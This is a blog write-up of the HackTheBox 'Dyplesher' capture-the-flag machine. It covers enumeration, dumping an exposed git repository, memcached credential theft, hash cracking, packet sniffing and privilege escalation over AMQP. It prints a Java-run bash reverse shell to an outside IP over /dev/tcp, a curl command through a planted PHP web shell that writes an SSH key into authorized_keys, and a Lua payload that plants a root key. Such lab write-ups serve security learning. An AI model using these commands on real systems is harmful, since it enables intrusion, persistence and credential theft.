HackTheBox Dyplesher Writeup – 10.10.10.190

Hello and welcome to my HacktheBox Dyplesher (10.10.10.190) writeup. The insane difficulty Linux machine by felamos & yuntao.

The Dyplesher box starts with full enumeration. The machine was so unstable I was not able to run namp properly. Running the fuzzer gives a hint that Git is involved, however cloning and downloading the git is only the beginning. Once the Git is downloaded I come to know that the memcached is involved as well.

After getting the credentials using the Memcached-Cli tool another door opens, and another set of Git download need to be done. the full enumeration here is the must. Then comes the time-consuming plug-in development, if you are good in Java and not link me, it may be easy for you. So let us start.

Name: Dyplesher

Makers: felamos & yuntao

Difficulty: Insane

Points: 50

IP: 10.10.10.190

Enumeration

Like every other machine, I add the machine IP to hots file with machine name and start the intense namp scan. The namp results shows few numbers of higher ports and common lower ports are open.

# root @ ns09 in ~/htb/dyplesher [16:49:06] 
$ nmap  -p 1-16000 dyplesher.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-27 16:49 +03
Nmap scan report for dyplesher.htb (10.10.10.190)
Host is up (0.14s latency).
Not shown: 15994 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
3000/tcp  open  ppp
4369/tcp  open  epmd
5672/tcp  open  amqp
11211/tcp open  memcache

Nmap done: 1 IP address (1 host up) scanned in 186.15 seconds

The Web Service

As the HTTP port 80 is open, I opened the hosted page and it runs a Minecraft server – named “Worst Minecraft Server“. Also, I noticed another host name test.dyplesher.htb so add the new host to etc/hosts.

test.dyplesher.htb

Running WFUZZ

Both web apps didn’t reveal anything immediately, so I decided to run enumerate further using WFUZZ on both hosts. While the fuzzing is going on, I noticed the “.git” directory disclosed by the WFUZZ on test.dyplesher.htb.

wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt --hc 404,302 
-----
wfuzz -u http://dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt --hc 404,302
Target: http://dyplesher.htb/FUZZ
Total requests: 16243

===================================================================
ID           Response   Lines    Word     Chars       Payload                                   
===================================================================

000000001:   200        123 L    241 W    4252 Ch     "index.php"                               
000000102:   200        0 L      0 W      0 Ch        "favicon.ico"                             
000000149:   403        9 L      28 W     278 Ch      ".htaccess"                               
000000237:   200        2 L      3 W      24 Ch       "robots.txt"                              
000000517:   403        9 L      28 W     278 Ch      ".html"                                   
000000776:   403        9 L      28 W     278 Ch      ".php"                                    
000001499:   403        9 L      28 W     278 Ch      ".htpasswd"                               
000001748:   403        9 L      28 W     278 Ch      ".htm"                                    
000002003:   403        9 L      28 W     278 Ch      ".htpasswds"                              
000004397:   403        9 L      28 W     278 Ch      ".htgroup"                                
000004914:   403        9 L      28 W     278 Ch      "wp-forum.phps"                           
000006724:   403        9 L      28 W     278 Ch      ".htaccess.bak"                           
000008245:   403        9 L      28 W     278 Ch      ".htuser"                                 
000010870:   403        9 L      28 W     278 Ch      ".ht"                                     
000010871:   403        9 L      28 W     278 Ch      ".htc"  

Cloning The Exposed Repository

I used the GitDumper to close the exposed Git repository and restored index.php.

# root @ ns09 in ~/htb/dyplesher/GitTools/Dumper on git:master x 
$ ./gitdumper.sh http://test.dyplesher.htb/.git/ test.dyplesher
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########


[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/b1/fe9eddcdf073dc45bb406d47cde1704f222388
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/3f/91e452f3cbfa322a3fbd516c5643a6ebffc433
[+] Downloaded: objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391
[+] Downloaded: objects/27/29b565f353181a03b2e2edb030a0e2b33d9af0

# root @ ns09 in ~/htb/dyplesher/GitTools/Dumper on git:master x 
$ cd test.dyplesher 

# root @ ns09 in ~/htb/dyplesher/GitTools/Dumper/test.dyplesher on git:master o 
$ git restore index.php                              

# root @ ns09 in ~/htb/dyplesher/GitTools/Dumper/test.dyplesher on git:master o 
$ git restore README.md                                        

# root @ ns09 in ~/htb/dyplesher/GitTools/Dumper/test.dyplesher on git:master o
$ 

From restored index.php file I found the cached credentials of felamous.

Cached Credentials: felamos:zxcvbnm

As it was confirmed the Memcached is in place, let us use the well-known Memcached CLI tool (https://metacpan.org/pod/memcached-cli) .

Reference: https://www.npmjs.com/package/memcached-cli

Download the Tool:

Collecting Entries Using Memchached-CLI

Next step is to collect the memcached entries like user name and passwords using the credentials we have and the tool we just downloaded. The memcached server normally runs on the higher port: 11211.

# root @ ns09 in ~/htb/dyplesher
$ memcached-cli felamos:zxcvbnm@dyplesher.htb:11211
dyplesher.htb:11211> get username
MinatoTW
felamos
yuntao
dyplesher.htb:11211> get password
$2a$10$5SAkMNF9fPNam***************ePuI1DCJa
$2y$12$c3SrJLybUEOYm***************VrxiA3pQK
$2a$10$zXNCus.UXtiuJ***************itiwUoalS
dyplesher.htb:11211> 

Cracking The Hash

As we retrieved the passwords in salted hash, we cannot use it , but there is Mr. John for our rescue.

I have the credentials, but not sure where to use, so I decided to check the other ports running thinking they probably have some services running.

Gogs At The Port 3000

So my wild guess was correct there are other services running in the box as well, there is a Gogs installation running on the port 3000.

I register myself as nav1n and logged in, then I found the following users:

So finally I know where the credentials to be used. I managed to access each account on Gogs using the cracked credentials.

felamos

We can see Felamos is hosting a copy of git and memcached in his repo, we can easily close the repositories to local machine as we have the credentials. And without wasting a moment I download the repo.

Upon enumerating the downloaded files I don’t see anything special, but noticed that the memcached is the one I downloaded earlier. And I took a while to enumerate more on the git and found the following releases.

I download them all, but only repositories’ directory contains a folder named @hashed and this folder contains hashed git bundles.

# root @ ns09 in ~/htb/dyplesher/repositories/@hashed on git:master x 
$ ls -la
total 24
drwx------ 6 root root 4096 Sep  7  2019 .
drwx------ 3 root root 4096 Sep  7  2019 ..
drwx------ 3 root root 4096 Sep  7  2019 4b
drwx------ 3 root root 4096 May 24 06:06 4e
drwx------ 3 root root 4096 Sep  7  2019 6b
drwx------ 3 root root 4096 Sep  7  2019 d4

# root @ ns09 in ~/htb/dyplesher/repositories/@hashed on git:master x 
$ find . -type f
./4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
./d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle
./6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
./4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle

# root @ ns09 in ~/htb/dyplesher/repositories/@hashed on git:master x 

Unpacking the Git Bundles

So what I did is, I moved all .bundle files into a new directory I created “Bundle-Unpack”.

# root @ ns09 in ~/htb/dyplesher/bundle-unpack
$ ls -la
total 21512
drwxr-xr-x 2 root root     4096 May 28 02:01 .
drwxr-xr-x 5 root root     4096 May 28 02:00 ..
-rw-r--r-- 1 root root    10837 Sep  7  2019 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
-rw-r--r-- 1 root root 21952510 May 24 06:17 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
-rw-r--r-- 1 root root    31545 Sep  7  2019 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
-rw-r--r-- 1 root root    17569 Sep  7  2019 d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

# root @ ns09 in ~/htb/dyplesher/bundle-unpack
$ 

Then, I used Git Clone command to unpack them.

# root @ ns09 in ~/htb/dyplesher/bundle-unpack 
$ ls -la
total 21512
drwxr-xr-x 2 root root     4096 May 28  .
drwxr-xr-x 5 root root     4096 May 28  ..
-rw-r--r-- 1 root root    10837 Sep  7  2019 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
-rw-r--r-- 1 root root 21952510 May 24 06:17 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
-rw-r--r-- 1 root root    31545 Sep  7  2019 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
-rw-r--r-- 1 root root    17569 Sep  7  2019 d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

# root @ ns09 in ~/htb/dyplesher/bundle-unpack
$ git clone 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle 
Cloning into '4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a'...
Receiving objects: 100% (39/39), 10.46 KiB | 1.31 MiB/s, done.
Resolving deltas: 100% (12/12), done.

# root @ ns09 in ~/htb/dyplesher/bundle-unpack 
$ git clone 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
Cloning into '4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce'...
Receiving objects: 100% (51/51), 20.94 MiB | 37.61 MiB/s, done.
Resolving deltas: 100% (5/5), done.

# root @ ns09 in ~/htb/dyplesher/bundle-unpack 
$ git clone 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
Cloning into '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'...
Receiving objects: 100% (85/85), 30.69 KiB | 10.23 MiB/s, done.
Resolving deltas: 100% (40/40), done.

# root @ ns09 in ~/htb/dyplesher/bundle-unpack 
$ git clone d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle
Cloning into 'd4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35'...
Receiving objects: 100% (21/21), 16.98 KiB | 8.49 MiB/s, done.
Resolving deltas: 100% (9/9), done.

Once the unpacking is successfully done, I started enumerating and this went almost 25 – 30 minutes of enumeration of the folders and the contents until found a directory Login Security which contained a SQLite database which eventually showed me there is a hashed credential.

I let John to crack the password and I talked to one of my friend over the Discord about the usage of the new credentials I got. Before he replies John finished his task and I have the clear text password now.

Logging In to Dashboard

As I was able to crack the password using JTR, I found the way to login as well. I logged-in to the dashboard suing one of the email id found earlier.

The dashboard has a statistics of users and option to upload/ delete and reload plugin. Other than this I don’t see anything useful. I again hit a wall, so decided to talk to friends at discord. The answer was not favorable, I need to create a plugin in Java with reverse shell, well, if you ask me what do I hate the in the coding most?, I tell you its JAVA and the Java development.

I finally found the easiest way (the laziest way) to make a workable Plugin with reverse shell and upload it through http://dyplesher.htb/home/add and then reload it to activate it.

I used the IntelliJIDEA IDE to develop the plugin.

Developing The Plugin

pom.xml

    <groupId>htb.dyplesher</groupId>
    <artifactId>minecraft_plugin</artifactId>
    <version>TEST version 1</version>    

main.java

I used the PentestMonkey‘s reverse shell idea and worked on it to make my own reverse shell.

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Uploading the Plugin:

Activating The Plugin

Once the plugin was loaded and activated successfully, I opened my PHP reverse shell nav1n.php and to make sure everything is working fine I run the WhoAmI and got MinatoTW as user.

The next step is to generate a fresh SSK key and copy my SSH Public key to MinatoTW’s ssh directory.

# root @ ns09 in ~/htb/dyplesher [17:31:03] 
$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
The key's randomart image is:
+---[RSA 3072]----+
|    . o o.       |
|     B = oo      |
|    + O o. .     |
|     + ooo.      |
|      +.S.o.     |
|o    . o  +o     |
| =oo.    *  .    |
|===+E   . +.     |
|@BO+     . ..    |
+----[SHA256]-----+

# root @ ns09 in ~/htb/dyplesher [17:31:50] 
$ curl -G 'http://test.dyplesher.htb/nav1n.php' --data-urlencode 'cmd=echo ssh-rsa AAAAB3NzaC1yc/---------snip------------/floNC8dQgsN8= root@ns09 > /home/MinatoTW/.ssh/authorized_keys'
# root @ ns09 in ~/htb/dyplesher [17:35:55]

Once uploaded, I made sure the key is copied from the reverse shell.

Getting User

The next step is straightforward.

SSH

As I can see my SSH public key is copied, I immediately SSH the box as minatotw and got successfully logged-in.

As I can see the user MinatoTW is a part of Wireshark group, I’m not sure yet what to do with that, possibly he’s running Wireshark service. Let’s find it out. First I need to get the interface ids:

Once I know the interface I captured the traffic using the TShark.

Downloading the Capture:

I left the capture to run for like 15 minutes so that I could have as much as data possible. Once done I download the capture to my local machine using scp.

Analyzing PCAP file

I started analyzing the PCAP file as I know I’m going to fish something huge. After analyzing for few minutes, I found many users and their credentials and it didn’t take much time for me to understand these are the credentials I was looking for.

Creds found:

  • Yuntao:wag******ob
  • Felamos:tie*******eg
  • MinatoTW:bi*******ov

As soon as I gathered the password of the users, I tried to switch to a new user, and got logged-in as Felamos. The User.txt was found in Felamos” home directory and I grabbed it immediately.

Privilege Escalation

After a couple of days of battle, I finally got the user. It was such a great feeling, I slept last night at 4AM, I wasted half of the time just finding a way to use Jar file to insert my reverse shell. It wouldn’t be that easy if not a fellow HTB’n give me nudge. His reply was so precise that I won the half the battle in the HTB forum DM itself.

Processes:

So the Lua is running in the machine and after discussing with a couple of others at Discord we decided that the way of exploit is using malicious lua script/plugin. But question is how?

Pika

The Pika is the Advanced Message Queuing Protocol (AMQP) that is two-way RPC protocol where the client can send requests to the server and the server can send requests to a client, Pika implements or extends IO loops in each of its asynchronous connection adapters.

The Pika pika.credentials module provides the mechanism by which you pass the username and password to the ConnectionParameters class when it is created.

Example:

import pika
credentials = pika.PlainCredentials('username', 'password')
parameters = pika.ConnectionParameters(credentials=credentials)

Ref: https://pika.readthedocs.io/en/stable/intro.html and this: https://www.programcreek.com/python/example/9241/pika.ConnectionParameters

So based on the above references, we made a python script to connect to the lus malicious plugin running in the server.

credentials = pika.PlainCredentials('yuntao', 'E********p')
parameters = pika.ConnectionParameters('10.10.10.190',5672,'/',credentials)
connection = pika.BlockingConnection(parameters)
body='http://127.0.0.1:9999/68523.lua')

I made a lua plugin file and named it 68523.lua and copied my SSH public key in to it. When the file is triggered it will write my SSH key in to the /root/.ssh/authorized_keys.

Then I run my python script lua.py from my local Kali machine.

At the same time I saw the request on the Server was hit and my malicious plugin was activated. I immediately ssh the box as root, but it didn’t work, I had to try a couple of times before finally I got the root.

Thanks for reading. It was a great box worth 50 points. the user was much harder than the Root.

References:

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.